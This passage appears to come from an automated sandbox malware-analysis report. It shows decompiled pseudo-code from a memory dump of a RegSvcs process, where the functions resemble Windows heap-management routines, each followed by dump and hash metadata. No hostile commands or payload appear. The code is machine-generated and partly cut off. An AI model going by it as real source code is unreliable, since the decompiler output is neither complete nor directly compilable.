                                          								_t175 =  *(_t120 + 4) & 0x0000001f | _t187 << 0x00000005;
                                          								 *(_t120 + 8) = _t87;
                                          								 *(_t120 + 4) = _t175;
                                          								if( *(_t120 + 8) != 0) {
                                          									_push(0);
                                          									_t87 = E013B0180(_t147);
                                          									_t175 =  *(_t120 + 4);
                                          								}
                                          								goto L22;
                                          							} else {
                                          								goto L16;
                                          							}
                                          							do {
                                          								L16:
                                          								_t121 =  *(_t120 + 8);
                                          								_v32 = _t121;
                                          								while(1) {
                                          									_t148 =  *(_t121 + _t180 * 4);
                                          									_v28 = _t148;
                                          									if((_t148 & 0x00000001) != 0) {
                                          										goto L19;
                                          									}
                                          									 *(_t121 + _t180 * 4) =  *_t148;
                                          									_t124 =  *(_t148 + 4) & _t170;
                                          									_t173 = _v8;
                                          									_t154 = _t187 - 0x00000001 & (( *(_t148 + 4) & _t170) >> 0x00000018) + ((( *(_t148 + 4) & _t170) >> 0x00000010 & 0x000000ff) + ((_t124 >> 0x00000008 & 0x000000ff) + ((_t124 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                                          									_t127 = _v28;
                                          									 *_t127 =  *(_t173 + _t154 * 4);
                                          									 *(_t173 + _t154 * 4) = _t127;
                                          									_t170 = _v24;
                                          									_t121 = _v32;
                                          								}
                                          								L19:
                                          								_t180 = _t180 + 1;
                                          								_t120 =  &(_v20[2]);
                                          							} while (_t180 <  *(_t120 + 4) >> 5);
                                          							goto L20;
                                          						} else {
                                          							_t174 = _t179;
                                          							_t183 = _v28;
                                          							do {
                                          								_t183 = _t183 + 1;
                                          								 *_t174 = _t107;
                                          								_t174 =  &(_t174[1]);
                                          							} while (_t183 < _t144);
                                          							goto L15;
                                          						}
                                          					}
                                          					_t155 = _t141 | 0xffffffff;
                                          					if(_t187 == 0) {
                                          						L9:
                                          						_t187 = 1 << _t155;
                                          						goto L10;
                                          					} else {
                                          						goto L8;
                                          					}
                                          					do {
                                          						L8:
                                          						_t155 = _t155 + 1;
                                          						_t187 = _t187 >> 1;
                                          					} while (_t187 != 0);
                                          					goto L9;
                                          				}
                                          			}














































                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5168f82943739878e428a71945346d2fe2656220f6832cc5438a62daa2f6a50c
                                          • Instruction ID: aa368aff12d64833ae52aa2b744f64eb23b0c0bfdac1816c297217cc1396cf2f
                                          • Opcode Fuzzy Hash: 5168f82943739878e428a71945346d2fe2656220f6832cc5438a62daa2f6a50c
                                          • Instruction Fuzzy Hash: EA71C572A00215DBDB28CF5CC8C1BAEBBF6EB84314F198269E915AF785D734D941CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 25%
                                          			E013AFA2B(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                          				void* _t98;
                                          				signed char _t106;
                                          				intOrPtr _t107;
                                          				signed char _t114;
                                          				signed short _t116;
                                          				signed short _t117;
                                          				signed short _t121;
                                          				signed short _t123;
                                          				signed int* _t127;
                                          				signed int _t128;
                                          				signed int _t130;
                                          				signed short _t134;
                                          				void* _t135;
                                          				signed int* _t136;
                                          				void* _t138;
                                          				signed int _t148;
                                          				signed int _t154;
                                          				signed int _t156;
                                          				signed int _t157;
                                          				intOrPtr _t163;
                                          				intOrPtr _t168;
                                          				void* _t169;
                                          				intOrPtr _t171;
                                          
                                          				_t157 = __edx;
                                          				_push(0x2c);
                                          				_push(0x13d0e38);
                                          				_t98 = E0134D08C(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t169 - 0x34)) = __edx;
                                          				_t168 = __ecx;
                                          				 *((intOrPtr*)(_t169 - 0x38)) = __ecx;
                                          				 *((intOrPtr*)(_t169 - 0x20)) = 0;
                                          				 *((intOrPtr*)(_t169 - 0x1c)) = 0;
                                          				_t171 =  *0x13e7bc8; // 0x0
                                          				if(_t171 == 0) {
                                          					 *((intOrPtr*)(_t169 - 4)) = 0;
                                          					_t148 =  *__edx;
                                          					 *(_t169 - 0x2c) = _t148 & 0x0000ffff;
                                          					 *(_t169 - 0x28) = _t148 >> 0x18;
                                          					 *(_t169 - 0x24) = _t148 >> 8;
                                          					_t106 = _t148 >> 0x10;
                                          					if(( *(__ecx + 0x4c) & _t148) == 0) {
                                          						 *((intOrPtr*)(_t169 - 0x1c)) = 0xa;
                                          						if(( *(__ecx + 0x40) & 0x04000000) != 0 ||  *(_t169 - 0x28) == (_t106 ^ _t148 ^  *(_t169 - 0x24))) {
                                          							_t148 =  *(_t169 - 0x2c) & 0x0000ffff;
                                          							 *((intOrPtr*)(_t169 - 0x1c)) = 1;
                                          							_t114 =  *((intOrPtr*)(_t157 + 6));
                                          							if(_t114 == 0) {
                                          								_t163 = _t168;
                                          							} else {
                                          								_t163 = (1 - (_t114 & 0x000000ff) << 0x10) + (_t157 & 0xffff0000);
                                          							}
                                          							 *((intOrPtr*)(_t169 - 0x20)) = _t163;
                                          							_t116 = _t148 & 0x0000ffff;
                                          							if( *((intOrPtr*)(_t163 + 8)) == 0xffeeffee) {
                                          								_t148 =  *((intOrPtr*)(_t157 + 7));
                                          								if(_t148 == 4) {
                                          									L12:
                                          									_t117 = _t116 & 0x0000ffff;
                                          									 *(_t169 - 0x2c) = _t117;
                                          									 *((intOrPtr*)(_t169 - 0x1c)) = 3;
                                          									if(_t148 != 3) {
                                          										 *((intOrPtr*)(_t169 - 0x1c)) = 6;
                                          										_t148 =  *(_t168 + 0x54) & 0x0000ffff;
                                          										 *(_t169 - 0x24) = _t148;
                                          										_push(0);
                                          										_pop(0);
                                          										if(( *(_t157 + 4 + (_t117 & 0x0000ffff) * 8) ^ _t148) ==  *(_t169 - 0x2c)) {
                                          											_t121 = _t148;
                                          											goto L23;
                                          										}
                                          									} else {
                                          										_t30 = _t157 + 8; // 0x8
                                          										_t148 = _t30;
                                          										_t130 =  *(_t148 + 0x10);
                                          										if((_t130 & 0x00000fff) == 0 && _t130 >=  *((intOrPtr*)(_t163 + 0x1c)) &&  *((intOrPtr*)(_t148 + 0x14)) +  *(_t148 + 0x10) <=  *((intOrPtr*)(_t163 + 0x28))) {
                                          											 *((intOrPtr*)(_t169 - 0x1c)) = 4;
                                          											_t148 =  *_t148;
                                          											_t134 =  *( *(_t157 + 0xc));
                                          											 *(_t169 - 0x2c) = _t134;
                                          											if(_t134 ==  *((intOrPtr*)(_t148 + 4))) {
                                          												_t42 = _t157 + 8; // 0x8
                                          												_t135 = _t42;
                                          												if( *(_t169 - 0x2c) == _t135) {
                                          													 *((intOrPtr*)(_t169 - 0x1c)) = 5;
                                          													_t136 = _t135 + 8;
                                          													 *(_t169 - 0x2c) = _t136;
                                          													_t148 =  *_t136;
                                          													_t138 =  *(_t136[1]);
                                          													if(_t138 ==  *((intOrPtr*)(_t148 + 4)) && _t138 ==  *(_t169 - 0x2c)) {
                                          														_t121 =  *(_t168 + 0x54) & 0x0000ffff;
                                          														 *(_t169 - 0x24) = _t121;
                                          														L23:
                                          														 *((intOrPtr*)(_t169 - 0x1c)) = 7;
                                          														_t148 =  *(_t157 + 4) & 0x0000ffff;
                                          														if(_t121 == _t148) {
                                          															L31:
                                          															 *((intOrPtr*)(_t169 - 0x1c)) = 8;
                                          															if(( *(_t157 + 2) & 0x00000001) != 0) {
                                          																L34:
                                          																 *((intOrPtr*)(_t169 - 0x1c)) = 9;
                                          															} else {
                                          																_t148 =  *(_t157 + 8);
                                          																_t123 =  *( *(_t157 + 0xc));
                                          																 *(_t169 - 0x2c) = _t123;
                                          																if(_t123 ==  *((intOrPtr*)(_t148 + 4)) &&  *(_t169 - 0x2c) == _t157 + 8) {
                                          																	goto L34;
                                          																}
                                          															}
                                          														} else {
                                          															_t127 = _t157 - ((_t148 ^ _t121 & 0x0000ffff) << 3);
                                          															if( *(_t168 + 0x4c) == 0) {
                                          																_t128 =  *_t127;
                                          																_t154 =  *(_t169 - 0x24) & 0x0000ffff;
                                          															} else {
                                          																_t156 =  *_t127;
                                          																 *(_t169 - 0x30) = _t156;
                                          																if(( *(_t168 + 0x4c) & _t156) == 0) {
                                          																	_t128 = _t156;
                                          																} else {
                                          																	_t128 =  *(_t168 + 0x50) ^ _t156;
                                          																	 *(_t169 - 0x30) = _t128;
                                          																}
                                          																_t154 =  *(_t168 + 0x54) & 0x0000ffff;
                                          															}
                                          															 *(_t169 - 0x24) = _t154;
                                          															_t148 =  *(_t157 + 4) & 0x0000ffff ^  *(_t169 - 0x24);
                                          															if(_t128 == _t148) {
                                          																goto L31;
                                          															}
                                          														}
                                          													}
                                          												}
                                          											}
                                          										}
                                          									}
                                          								} else {
                                          									 *((intOrPtr*)(_t169 - 0x1c)) = 2;
                                          									if(_t157 >=  *((intOrPtr*)(_t163 + 0x1c)) && _t157 <  *((intOrPtr*)(_t163 + 0x28)) &&  *((intOrPtr*)(_t163 + 0x18)) == _t168) {
                                          										goto L12;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          					 *((intOrPtr*)(_t169 - 4)) = 0xfffffffe;
                                          					if( *(_t168 + 0x4c) != 0) {
                                          						 *(_t157 + 3) =  *(_t157 + 2) ^  *(_t157 + 1) ^  *_t157;
                                          						 *_t157 =  *_t157 ^  *(_t168 + 0x50);
                                          					}
                                          					_t107 =  *((intOrPtr*)(_t169 - 0x1c));
                                          					if(_t107 > 0xa) {
                                          						L45:
                                          						_push(_t148);
                                          						_push(0);
                                          						_push( *((intOrPtr*)(_t169 - 0x1c)));
                                          						_push(_t157);
                                          						_push(2);
                                          						goto L46;
                                          					} else {
                                          						switch( *((intOrPtr*)(( *(_t107 + 0x13afcfb) & 0x000000ff) * 4 +  &M013AFCE3))) {
                                          							case 0:
                                          								_push(_t148);
                                          								_push(0);
                                          								_push( *((intOrPtr*)(_t169 - 0x1c)));
                                          								_push(_t157);
                                          								_push(3);
                                          								goto L46;
                                          							case 1:
                                          								_push(__ecx);
                                          								_push(__ebx);
                                          								_push( *((intOrPtr*)(__edi + 0x18)));
                                          								_push(__edx);
                                          								_push(0xc);
                                          								goto L46;
                                          							case 2:
                                          								_push(__ecx);
                                          								_push(__ebx);
                                          								_push(3);
                                          								_push(__edx);
                                          								__ecx = 0;
                                          								goto L47;
                                          							case 3:
                                          								_push(__ecx);
                                          								_push(__ebx);
                                          								_push( *((intOrPtr*)(__ebp - 0x1c)));
                                          								_push(__edx);
                                          								_push(0xe);
                                          								goto L46;
                                          							case 4:
                                          								_push(__ecx);
                                          								_push(__ebx);
                                          								_push(8);
                                          								_push(__edx);
                                          								_push(0xd);
                                          								L46:
                                          								goto L47;
                                          							case 5:
                                          								goto L45;
                                          						}
                                          					}
                                          					L47:
                                          					_t98 = E013BA80D(_t168);
                                          				}
                                          				return E0134D0D1(_t98);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8870937ba5adf60ec5520df0ff3d68866a8bbd539901d3219299b374c9f08db4
                                          • Instruction ID: eb79bbccc3fc15e22b9d86372e25fb3a9cf6f09ada17dcbd2a7de6a8c04e2c92
                                          • Opcode Fuzzy Hash: 8870937ba5adf60ec5520df0ff3d68866a8bbd539901d3219299b374c9f08db4
                                          • Instruction Fuzzy Hash: 5B818E7090064A9FDF28CF5AC4946BDFBF9FF18309F94815AE946AB681D3349881CF64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E013BDBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, signed int _a8) {
                                          				char _v5;
                                          				signed short _v12;
                                          				signed int _v16;
                                          				void* _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				intOrPtr _v36;
                                          				signed short _v40;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __ebp;
                                          				signed int* _t75;
                                          				signed short _t77;
                                          				intOrPtr _t78;
                                          				signed int _t92;
                                          				signed int _t98;
                                          				signed int _t99;
                                          				signed short _t105;
                                          				unsigned int _t108;
                                          				signed int _t112;
                                          				signed int _t119;
                                          				signed int _t124;
                                          				intOrPtr _t137;
                                          				signed char _t139;
                                          				signed int _t140;
                                          				unsigned int _t141;
                                          				signed char _t142;
                                          				intOrPtr _t152;
                                          				signed int _t153;
                                          				signed int _t158;
                                          				signed int _t159;
                                          				intOrPtr _t172;
                                          				signed int _t176;
                                          				signed int _t178;
                                          				signed short _t182;
                                          				intOrPtr _t183;
                                          
                                          				_t119 = __edx;
                                          				_v20 = __ecx;
                                          				_t152 = _a4;
                                          				_t172 = 0;
                                          				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x13e6114;
                                          				_v16 = __edx;
                                          				_v36 = 0;
                                          				_v5 = 0xff;
                                          				_v40 = _t182;
                                          				_v24 = _t182 >> 0x10;
                                          				if(_t152 == 0) {
                                          					L14:
                                          					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
                                          					_v24 = _t124;
                                          					_t183 = _v36;
                                          					_t53 = _t119 + 0x10; // 0x10
                                          					_t75 = _t53;
                                          					_v28 = _t75;
                                          					_t77 =  *_t75 & 0x0000ffff;
                                          					_v12 = _t77;
                                          					L15:
                                          					while(1) {
                                          						if(_t183 != 0) {
                                          							L20:
                                          							_t153 = _t77 + 0x00000001 & 0x0000ffff;
                                          							asm("lock cmpxchg [ebx], cx");
                                          							_t119 = _v16;
                                          							_t77 = _t77 & 0x0000ffff;
                                          							_v12 = _t77;
                                          							if(_t153 == (_t77 & 0x0000ffff) + 1) {
                                          								if(_t77 == 0) {
                                          									_t78 = _t172;
                                          									L27:
                                          									_t119 = L013BD016(_t119, _t183, _t119, _t78);
                                          									E0130FFB0(_t119, _t172, _t183 + 8);
                                          									_t183 = _t172;
                                          									if(_t119 != 0) {
                                          										E013BC52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x12daff8) & 0x000000ff) * 4)), _t119, _a8);
                                          									}
                                          									L29:
                                          									_t172 = 1;
                                          									if(_t183 != 0) {
                                          										_t72 = _t183 + 8; // 0x8
                                          										E0130FFB0(_t119, 1, _t72);
                                          									}
                                          									L31:
                                          									return _t172;
                                          								}
                                          								if((_t77 & 0x0000ffff) != _v24 - 1) {
                                          									goto L29;
                                          								}
                                          								_t78 = 2;
                                          								goto L27;
                                          							}
                                          							_t124 = _v24;
                                          							continue;
                                          						}
                                          						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
                                          							_t183 = E013BE018(_t119,  &_v5);
                                          							if(_t183 == 0) {
                                          								_t172 = 1;
                                          								goto L31;
                                          							}
                                          							goto L19;
                                          						} else {
                                          							L19:
                                          							_t77 = _v12;
                                          							goto L20;
                                          						}
                                          					}
                                          				}
                                          				_t92 = _t182 & 0x0000ffff;
                                          				_v28 = _t92;
                                          				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x12daff8) & 0x000000ff) * 4));
                                          				_t98 =  *((intOrPtr*)(_t137 + 0x24));
                                          				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
                                          				_v24 = _t98;
                                          				_t99 = _t158;
                                          				_v32 = _t158;
                                          				_t139 =  *(_t137 + 0x28) & 0x000000ff;
                                          				if(_t98 == 0) {
                                          					_v12 = _t99 >> _t139;
                                          					_t159 = _t158 & (1 << _t139) - 0x00000001;
                                          					_t105 = _v12;
                                          				} else {
                                          					_t105 = E0133D340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
                                          					_v12 = _t105;
                                          					_t159 = _v32 - _v28 * _t105;
                                          				}
                                          				if(_t159 == 0) {
                                          					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
                                          					if(_t140 >= _t105) {
                                          						_t140 = _t105 & 0x0000ffff;
                                          					}
                                          					 *(_t119 + 0x14) = _t140;
                                          					_t141 = _t105 + _t105;
                                          					_t142 = _t141 & 0x0000001f;
                                          					_t176 = 3;
                                          					_t178 =  !(_t176 << _t142);
                                          					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
                                          					do {
                                          						asm("lock cmpxchg [ebx], edx");
                                          					} while ((_t108 & _t178) != 0);
                                          					if((_t108 >> _t142 & 0x00000001) != 0) {
                                          						_t119 = _v16;
                                          						_t172 = 0;
                                          						if( *((char*)(_t119 + 0x1d)) > 1) {
                                          							_t112 = E013BD864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
                                          							_t184 = _t112;
                                          							if(_t112 != 0xffffffff) {
                                          								asm("lock xadd [ecx], edx");
                                          								E013BD8DF(_v20, _t119, _t184, 2, _a8);
                                          							}
                                          						}
                                          						goto L14;
                                          					}
                                          					_push(_t142);
                                          					_push(_v12);
                                          					E013BA80D( *_v20, 0x11, _a4, _v16);
                                          					_t172 = 0;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4af4b7a4405460370a6857c3e53da536bee1da5118ffae888932a04db976903f
                                          • Instruction ID: 10ef0b3ef8a5dad0c22b1f5fc3858b18cd8ee63b4fd7d037b8851af2f991c2cc
                                          • Opcode Fuzzy Hash: 4af4b7a4405460370a6857c3e53da536bee1da5118ffae888932a04db976903f
                                          • Instruction Fuzzy Hash: 8B71F675A0012A9FCF14DF99C4C09FEBBF5EF88218B14416DEA85EB784E634C945CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 97%
                                          			E013C28EC(signed int __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                          				char _v5;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				intOrPtr _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				void* __ebx;
                                          				void* __edi;
                                          				unsigned int _t62;
                                          				unsigned int _t69;
                                          				signed int _t71;
                                          				signed int _t72;
                                          				signed int _t77;
                                          				intOrPtr _t85;
                                          				unsigned int _t95;
                                          				signed int _t98;
                                          				signed int _t100;
                                          				void* _t104;
                                          				signed short _t108;
                                          				signed int _t113;
                                          				intOrPtr _t115;
                                          				signed int _t116;
                                          				intOrPtr _t117;
                                          				signed int _t118;
                                          				intOrPtr _t120;
                                          				signed int _t121;
                                          				signed int _t122;
                                          				signed int _t124;
                                          				signed int _t125;
                                          				signed int _t126;
                                          				signed int _t136;
                                          				signed int _t137;
                                          				signed int _t140;
                                          				signed int _t145;
                                          				signed int _t147;
                                          				signed int _t148;
                                          				void* _t156;
                                          
                                          				_t115 = _a4;
                                          				_v40 = __edx;
                                          				_t147 = __ecx;
                                          				_v20 = __ecx;
                                          				if(__edx != _t115) {
                                          					_t115 = _t115 + 2;
                                          				}
                                          				_t62 = _t115 + 7 >> 3;
                                          				_t120 = _t62 + 1;
                                          				_v28 = _t120;
                                          				if(( *(_t147 + 0x38) & 0x00000001) != 0) {
                                          					_t120 = _t62 + 2;
                                          					_v28 = _t120;
                                          				}
                                          				_t64 = _t120 + _t120 & 0x0000ffff;
                                          				_t136 = _a8 & 0x00000001;
                                          				_v36 = _t120 + _t120 & 0x0000ffff;
                                          				_v12 = _t136;
                                          				if(_t136 == 0) {
                                          					E01312280(_t64, _t147);
                                          					_t136 = _v12;
                                          				}
                                          				_v5 = 0xff;
                                          				while(1) {
                                          					L7:
                                          					_t121 = 0;
                                          					_t145 =  *(_t147 + 8);
                                          					_v24 =  *(_t147 + 0xc) & 1;
                                          					_v16 = 0;
                                          					if(_t145 == 0) {
                                          						goto L17;
                                          					}
                                          					_t108 =  *0x13e6110; // 0x7900493f
                                          					_v32 = _t108 & 0x0000ffff;
                                          					do {
                                          						_t156 = _v36 - ( *(_t145 - 4) & 0x0000ffff ^ _t145 - 0x00000004 & 0x0000ffff ^ _v32);
                                          						if(_t156 < 0) {
                                          							__eflags = _v24;
                                          							_t121 = _t145;
                                          							_t113 =  *_t145;
                                          							_v16 = _t121;
                                          							if(_v24 == 0) {
                                          								L15:
                                          								_t145 = _t113;
                                          								goto L16;
                                          							}
                                          							__eflags = _t113;
                                          							if(_t113 == 0) {
                                          								goto L15;
                                          							}
                                          							_t145 = _t145 ^ _t113;
                                          							goto L16;
                                          						}
                                          						if(_t156 <= 0) {
                                          							L18:
                                          							if(_t145 != 0) {
                                          								_t122 =  *0x13e6110; // 0x7900493f
                                          								_t36 = _t145 - 4; // -4
                                          								_t116 = _t36;
                                          								_t137 = _t116;
                                          								_t69 =  *_t116 ^ _t122 ^ _t116;
                                          								__eflags = _t69;
                                          								if(_t69 >= 0) {
                                          									_t71 = _t69 >> 0x00000010 & 0x00007fff;
                                          									__eflags = _t71;
                                          									if(_t71 == 0) {
                                          										L36:
                                          										_t72 = 0;
                                          										__eflags = 0;
                                          										L37:
                                          										_t139 = _t137 - (_t72 << 0x0000000c) & 0xfffff000;
                                          										__eflags = (0x0000abed ^  *((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x16)) -  *((intOrPtr*)((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x14));
                                          										if(__eflags == 0) {
                                          											_t77 = E013C25DD(_t147, _t139, __eflags, _t116, _v28, _a8,  &_v5);
                                          											__eflags = _t77;
                                          											if(_t77 == 0) {
                                          												L39:
                                          												_t148 = 0;
                                          												__eflags = _v12;
                                          												if(_v12 != 0) {
                                          													L42:
                                          													return _t148;
                                          												}
                                          												E0130FFB0(_t116, _t145, _v20);
                                          												L41:
                                          												_t148 = 0;
                                          												__eflags = 0;
                                          												goto L42;
                                          											}
                                          											_t46 = _t116 + 8; // 0x4
                                          											_t148 = _t46;
                                          											_t140 = (( *_t116 ^  *0x13e6110 ^ _t116) >> 0x00000001 & 0x00007fff) * 8 - 8;
                                          											_t85 = _v20;
                                          											__eflags =  *(_t85 + 0x38) & 0x00000001;
                                          											if(( *(_t85 + 0x38) & 0x00000001) != 0) {
                                          												_t118 = _t116 + 0x10;
                                          												__eflags = _t118 & 0x00000fff;
                                          												if((_t118 & 0x00000fff) == 0) {
                                          													_t148 = _t118;
                                          													_t140 = _t140 - 8;
                                          													__eflags = _t140;
                                          												}
                                          											}
                                          											_t117 = _v40;
                                          											_t124 =  *_t145;
                                          											__eflags = _t117 - _t140;
                                          											if(_t117 >= _t140) {
                                          												_t125 = _t124 & 0xfffffeff;
                                          												__eflags = _t125;
                                          												 *_t145 = _t125;
                                          											} else {
                                          												_t126 = _t124 | 0x00000100;
                                          												_push(_t126);
                                          												 *_t145 = _t126;
                                          												E013C2506(_t148, _t140, _t140 - _t117);
                                          												_t85 = _v20;
                                          											}
                                          											__eflags = _v12;
                                          											if(_v12 == 0) {
                                          												E0130FFB0(_t117, _t145, _t85);
                                          											}
                                          											__eflags = _a8 & 0x00000002;
                                          											if((_a8 & 0x00000002) != 0) {
                                          												E0133FA60(_t148, 0, _t117);
                                          											}
                                          											goto L42;
                                          										}
                                          										_push(_t122);
                                          										_push(0);
                                          										E013BA80D( *((intOrPtr*)(_t147 + 0x20)), 0x12, _t139, _t116);
                                          										goto L39;
                                          									}
                                          									_t137 = _t116 - (_t71 << 3);
                                          									_t95 =  *_t137 ^ _t122 ^ _t137;
                                          									__eflags = _t95;
                                          									if(_t95 < 0) {
                                          										L34:
                                          										_t98 =  *(_t137 + 4) ^ _t122 ^ _t137;
                                          										__eflags = _t98;
                                          										L35:
                                          										_t72 = _t98 & 0x000000ff;
                                          										goto L37;
                                          									}
                                          									_t100 = _t95 >> 0x00000010 & 0x00007fff;
                                          									__eflags = _t100;
                                          									if(_t100 == 0) {
                                          										goto L36;
                                          									}
                                          									_t137 = _t137 + _t100 * 0xfffffff8;
                                          									__eflags = _t137;
                                          									goto L34;
                                          								}
                                          								_t98 =  *_t145 ^ _t122 ^ _t116;
                                          								goto L35;
                                          							}
                                          							if(_t136 == 0) {
                                          								E0130FFB0(_t115, _t145, _t147);
                                          							}
                                          							_t104 = E013C3149(_t147, _t115, _a8);
                                          							_t146 = _t104;
                                          							if(_t104 == 0) {
                                          								goto L41;
                                          							} else {
                                          								if(_v12 == 0) {
                                          									E01312280(_t104, _t147);
                                          								}
                                          								_v5 = 0xff;
                                          								E013C2876(_t147, _t146);
                                          								_t136 = _v12;
                                          								goto L7;
                                          							}
                                          						}
                                          						_t113 =  *(_t145 + 4);
                                          						if(_v24 == 0 || _t113 == 0) {
                                          							_t121 = _v16;
                                          							goto L15;
                                          						} else {
                                          							_t121 = _v16;
                                          							_t145 = _t145 ^ _t113;
                                          						}
                                          						L16:
                                          					} while (_t145 != 0);
                                          					L17:
                                          					_t145 = _t121;
                                          					goto L18;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbf92d80a3396a10d8283b78d7555ebaf854a9876a451b5bbb94188b42c17497
                                          • Instruction ID: 1fed31b8128b1a9894628eb134ba3ae9ef3a10a718bcabf1b5c670651e09c685
                                          • Opcode Fuzzy Hash: fbf92d80a3396a10d8283b78d7555ebaf854a9876a451b5bbb94188b42c17497
                                          • Instruction Fuzzy Hash: 3071F475A0020A9BEB29CF6DC8806AFBBF6EF58B58F14816DD915D7280DB34DD01C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E0132138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
                                          				void* _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				void* __ebx;
                                          				signed int _t97;
                                          				signed int _t102;
                                          				void* _t105;
                                          				char* _t112;
                                          				signed int _t113;
                                          				signed int _t117;
                                          				signed int _t119;
                                          				signed int* _t122;
                                          				signed int _t124;
                                          				signed int _t130;
                                          				signed int _t136;
                                          				char _t150;
                                          				intOrPtr _t153;
                                          				signed int _t161;
                                          				signed int _t163;
                                          				signed int _t170;
                                          				signed int _t175;
                                          				signed int _t176;
                                          				signed int _t182;
                                          				signed int* _t183;
                                          				signed int* _t184;
                                          
                                          				_t182 = __ecx;
                                          				_t153 = _a24;
                                          				_t183 = __edx;
                                          				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
                                          				_t97 = _t153 - _a16;
                                          				if(_t97 > 0xfffff000) {
                                          					L19:
                                          					return 0;
                                          				}
                                          				asm("cdq");
                                          				_t150 = _a20;
                                          				_v16 = _t97 / 0x1000;
                                          				_t102 = _a4 + 0x00000007 & 0xfffffff8;
                                          				_t170 = _t102 + __edx;
                                          				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
                                          				_t105 = _t170 + 0x28;
                                          				_v12 = _t170;
                                          				if(_t105 >= _t150) {
                                          					if(_t105 >= _t153) {
                                          						goto L19;
                                          					}
                                          					_v8 = _t170 - _t150 + 8;
                                          					_push(E01320678(__ecx, 1));
                                          					_push(0x1000);
                                          					_push( &_v8);
                                          					_push(0);
                                          					_push( &_a20);
                                          					_push(0xffffffff);
                                          					if(E01339660() < 0) {
                                          						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
                                          						goto L19;
                                          					}
                                          					if(E01317D50() == 0) {
                                          						_t112 = 0x7ffe0380;
                                          					} else {
                                          						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          					}
                                          					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          						E013B138A(_t150, _t182, _a20, _v8, 3);
                                          					}
                                          					_t150 = _a20 + _v8;
                                          					_t153 = _a24;
                                          					_a20 = _t150;
                                          				}
                                          				_t183[0] = 1;
                                          				_t113 = _t153 - _t150;
                                          				_t183[1] = 1;
                                          				asm("cdq");
